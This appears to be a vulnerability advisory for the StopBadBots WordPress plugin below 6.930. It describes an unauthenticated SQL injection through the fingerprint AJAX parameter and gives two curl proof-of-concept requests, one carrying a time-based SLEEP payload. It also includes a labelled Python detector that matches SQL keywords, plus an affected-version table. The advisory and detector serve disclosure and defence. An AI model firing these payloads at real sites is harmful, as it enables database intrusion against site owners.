The plugin does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, which is available to unauthenticated users, leading to a SQL injection.

```
curl -i 'https://example.com/wp-admin/admin-ajax.php' --data 'action=stopbadbots_grava_fingerprint&fingerprint=0' -H 'X-Real-IP: 1.1.1.36'
```

then

```
curl -i 'https://example.com/wp-admin/admin-ajax.php' --data 'action=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(5))' -H 'X-Real-IP: 1.1.1.36'
```
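
A defensive check for this request pattern, as an added example that is not part of the original advisory or the plugin's code: it parses a POST body sent to admin-ajax.php and classifies the fingerprint value, so that requests carrying SQL syntax can be logged or blocked in front of an unpatched site. The allowed fingerprint format (letters, digits, `-`, `_`) and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

ACTION = "stopbadbots_grava_fingerprint"  # AJAX action named in the advisory

# Assumption: a legitimate fingerprint is a short token of letters, digits, '-' or '_'.
SAFE_FINGERPRINT = re.compile(r"[A-Za-z0-9_-]{1,128}")

# SQL constructs that have no place in a fingerprint value.
SQL_HINTS = re.compile(
    r"(?i)\b(select|union|sleep|benchmark|insert|update|delete|drop)\b"
    r"|--|/\*|;|['\"()]"
)


def classify_body(body: str) -> str:
    """Classify one URL-encoded POST body: ignore, ok, malformed or sqli-suspect."""
    # parse_qs percent-decodes values and keeps every copy of a repeated
    # parameter, so encoded payloads and duplicated parameters are both seen.
    params = parse_qs(body, keep_blank_values=True)
    if ACTION not in params.get("action", []):
        return "ignore"
    values = params.get("fingerprint", [])
    if not values:
        return "malformed"
    verdict = "ok"
    for value in values:
        if SQL_HINTS.search(value):
            return "sqli-suspect"
        if not SAFE_FINGERPRINT.fullmatch(value):
            verdict = "malformed"
    return verdict


# Constructed sample: (client IP, POST body) pairs, e.g. from a reverse-proxy body log.
SAMPLE = [
    ("1.1.1.36", "action=stopbadbots_grava_fingerprint&fingerprint=0"),
    ("1.1.1.36", "action=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(5))"),
    ("1.1.1.37", "action=heartbeat&interval=15"),
]


def flagged(records):
    """Return the (ip, verdict) pairs that are not plain 'ok' or 'ignore'."""
    results = ((ip, classify_body(body)) for ip, body in records)
    return [(ip, verdict) for ip, verdict in results if verdict not in ("ok", "ignore")]


if __name__ == "__main__":
    print(flagged(SAMPLE))
```

A filter like this is a stopgap for detection; the fix is updating the plugin to a version outside the affected range.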
CPE

Name | Operator | Version
---|---|---
stopbadbots | lt | 6.930